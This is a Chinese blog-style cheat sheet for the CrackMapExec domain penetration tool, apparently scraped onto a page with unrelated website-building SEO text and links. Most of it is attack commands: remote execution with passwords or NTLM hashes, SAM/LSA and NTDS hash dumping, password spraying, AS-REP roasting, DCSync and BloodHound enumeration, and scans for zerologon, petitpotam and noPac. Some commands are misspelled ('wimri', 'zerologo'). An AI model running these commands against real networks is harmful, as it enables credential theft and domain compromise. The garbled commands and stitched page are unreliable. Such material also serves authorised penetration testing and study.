当前位置: 首页 > news >正文

网站建设使用的基本技术一个公网ip可以做几个网站

网站建设使用的基本技术,一个公网ip可以做几个网站,微信推广图片,建设银行招聘门户网站提示#xff1a;文章写完后#xff0c;目录可以自动生成#xff0c;如何生成可参考右边的帮助文档 文章目录 前言一、CrackMapExec 是什么#xff1f;二、简单使用1、获取帮助信息2、smb连接执行命令3、使用winrm执行命令#xff08;躲避杀软#xff09;4、smb 协议常用枚… 提示文章写完后目录可以自动生成如何生成可参考右边的帮助文档 文章目录 前言一、CrackMapExec 是什么二、简单使用1、获取帮助信息2、smb连接执行命令3、使用winrm执行命令躲避杀软4、smb 协议常用枚举功能5、获取凭证 dump hash6、导出域ntds7、密码喷晒8、文件上传、下载9、检测主机上是否运行spooler、 webdav 服务10、枚举域用户11、ASREPRoast12、查找非约束委派账户13、检测ESC8adcs漏洞利用14、通过活动目录收集子网段信息15、查看具有DCsync权限用户16、收集bloodhound 信息17、通过RDP协议屏幕截图18、扫描zerologo、petitpotam、nopac漏洞 前言 最近接触到了这款CrackMapExec 域渗透工具目前使用感觉是挺不错了在阅读了该工具在wiki的使用说明之后把一些平时域中需要常用到的命令学习记录了下来。 一、CrackMapExec 是什么 CrackMapExec 也简称cme 是一款内网域渗透的工具可以对域进行信息收集或者一些常见域漏洞的探测。 二、简单使用 1、获取帮助信息 CrackMapExec -h 获取帮助信息 可以看到支持使用哪些协议 通过使用指定的协议可以获取进一步的帮助信息 CrackMapExec smb -h 2、smb连接执行命令 -x 通过cmd.exe 执行命令 -X 通过cmd.exe 调用执行powershell命令 crackmapexec smb 192.168.216.144 -u administrator -p pass1234! -x whoami 或者使用ntlm hash crackmapexec smb 192.168.216.144 -u administrator -H aad3b435b51404eeaad3b435b51404ee:ff1a0a31d936bc8bf8b1ffc5b244b356 -x whoami 默认情况下会自动选择登录域-d可以指定域登录-x 要执行的命令 CME将按以下顺序执行命令 1.wmiexec通过WMI执行命令 2.atexe通过Windows任务调度程序调度任务来执行命令 3.smbexec通过创建和运行服务来执行命令-X $PSVersionTable 使用查看powershell 版本环境命令 --amsi-bypass /path/payload 执行powershell3、使用winrm执行命令躲避杀软 身份验证成功时将显示Pwn3d! 通过winrm执行命令很多情况下可以绕过一些杀软的拦截 crackmapexec wimri 192.168.216.144 -u administrator -p pass1234! -x whoami4、smb 协议常用枚举功能 crackmapexec smb 192.168.1.0/24 -u UserNAme -p PASSWORDHERE --groups 枚举域组crackmapexec smb 192.168.1.0/24 --gen-relay-list relaylistOutputFilename.txt 枚举不需要smb签名的主机crackmapexec smb ip -u user -p pass -M enum_av 枚举主机上的杀软crackmapexec smb 192.168.216.144 -u test -p ppt1234! --shares 列出共享 crackmapexec smb 192.168.216.144 -u test -p ppt1234! --sessions 枚举有效sessionscrackmapexec smb 192.168.216.144 -u test -p ppt1234! --disks 列出磁盘crackmapexec smb 192.168.216.144 -u test -p ppt1234! --loggedon-users 枚举登录用户crackmapexec smb 192.168.216.144 -u test -p ppt1234! --users 枚举域用户crackmapexec smb 192.168.216.144 -u test -p ppt1234! --rid-brute 通过爆破RID枚举用户crackmapexec smb 192.168.216.144 -u test -p ppt1234! --pass-pol 获取域密码策略crackmapexec smb 192.168.1.0/24 -u UserNAme -p PASSWORDHERE --local-auth 验证本地用户并且测试登录 5、获取凭证 dump hash 当获取到高权限的用户可以使用–sam ,–lsa dump hash crackmapexec wimri 192.168.216.144 -u administrator -p pass1234! --sam/--lsa6、导出域ntds crackmapexec smb 192.168.216.144 -u administrator -p pass1234! --ntds7、密码喷晒 crackmapexec smb 192.168.1.101 -u user1 user2 user3 -p Summer18 多个用户一个密码进行喷晒 crackmapexec smb 192.168.1.101 -u /path/to/users.txt -p Summer18 使用users.txt 用户列表文件指定多用户喷晒 crackmapexec smb 192.168.1.101 -u Administrator -p /path/to/passwords.txt 爆破administrator用户密码 8、文件上传、下载 上传/tmp/whoami.txt 文件到 目标主机 \Windows\Temp\whoami.txt –put-file cme smb 172.16.251.152 -u user -p pass --put-file /tmp/whoami.txt \\Windows\\Temp\\whoami.txt 上传文件文件下载 –get-file cme smb 172.16.251.152 -u user -p pass --get-file \\Windows\\Temp\\whoami.txt /tmp/whoami.txt 下载文件9、检测主机上是否运行spooler、 webdav 服务 crackmapexec smb ip -u user -p pass -M spooler 查看打印机服务 crackmapexec smb ip -u user -p pass -M webdav 查看webdav服务10、枚举域用户 cme ldap 192.168.1.0/24 -u users.txt -p -k 11、ASREPRoast 查找不需要 Kerberos 预身份验证的用户查找不需要 Kerberos 预身份验证的用户 没有已知域用户密码的情况下 cme ldap 192.168.0.104 -u user.txt -p --asreproast output.txt在拥有域内用户权限的情况下 cme ldap 192.168.0.104 -u harry -p pass --asreproast output.txt12、查找非约束委派账户 cme ldap 192.168.0.104 -u harry -p pass --trusted-for-delegation13、检测ESC8adcs漏洞利用 查看adcs服务器 crackmapexec run ldap ip -u user -p pass -M adcs列出证书模板 crackmapexec run ldap ip -u user -p pass -M adcs -o SERVER-xxxx14、通过活动目录收集子网段信息 crackmapexec ldap ip -u user -p pass -M get-network crackmapexec ldap ip -u user -p pass -M get-network -o ONLY_HOSTStrue crackmapexec ldap ip -u user -p pass -M get-network -o ALLtrue15、查看具有DCsync权限用户 crackmapexec ldap lab-dc.lab.local -k --kdcHost lab-dc.lab.local -M daclread -o TARGET_DNDClab,DCLOCAL ACTIONread RIGHTSDCSync 16、收集bloodhound 信息 crackmapexec ldap ip -u user -p pass --bloodhound --ns ip --collection All17、通过RDP协议屏幕截图 crackmapexec rdp ip -u user -p password --screenshot --screentime 18、扫描zerologo、petitpotam、nopac漏洞 crackmapexec smb ip -u -p -M zerologo crackmapexec smb ip -u -p -M petitpotam crackmapexec smb ip -u user -p pass -M nopac还有其他协议的使用方法在此没有列出
http://www.hkea.cn/news/14356001/

相关文章:

  • 腾讯云做网站步骤做包装的网站
  • 国外英文网站百度账户托管
  • 网络小白如何建立个人网站网络推广平台加盟
  • 湖北网站建站系统哪家好高清图片免费下载
  • jsp网站空间合肥新闻 今天 最新消息
  • 欧卡乐网站建设快速网站仿制
  • 教程网站后台密码白头鹰网站一天可以做多少任务
  • 河南金建建设有限公司网站制作营销网页
  • 公司网站建设关键字描述做的网站提示不安全
  • 个人做房产网站word网站的链接怎么做的
  • mixkitcom素材网站金融培训网站源码
  • 注册公司网上核名网站专门做茶叶的网站
  • 网站备案号收回最近免费高清观看mv
  • 企业网站用什么套站手机优化软件排行
  • 曲靖房地产网站开发建设工程标准 免费下载网站
  • 慈溪开发小学网站建设深圳企业建设网站的目的
  • 站内搜索本网站怎么做做网站如何购买服务器吗
  • 传奇背景图网站怎么做兰州网络seo公司
  • 网站流量少seo学校培训课程
  • 绍兴市越城区建设局网站那个网站可以做链接
  • 设计师网站崩了做网站 做手机app要学什么软件
  • 夺宝网站建设wordpress适合视频网站吗
  • 黄石商城网站建设网站一般如何做搜索功能
  • 莱州网站建设有限公司网站备案和服务器备案
  • 五金设备网站建设给网站做网络安全的报价
  • 什么是网站建设技术网站建设都需要那些材料
  • 一站式服务中心开发一款社交软件需要多少钱
  • 房产公司网站建设方案做网站的电脑配置
  • 外贸网站关键词成都建设网站专业公司
  • 具有品牌的做网站私人网站服务器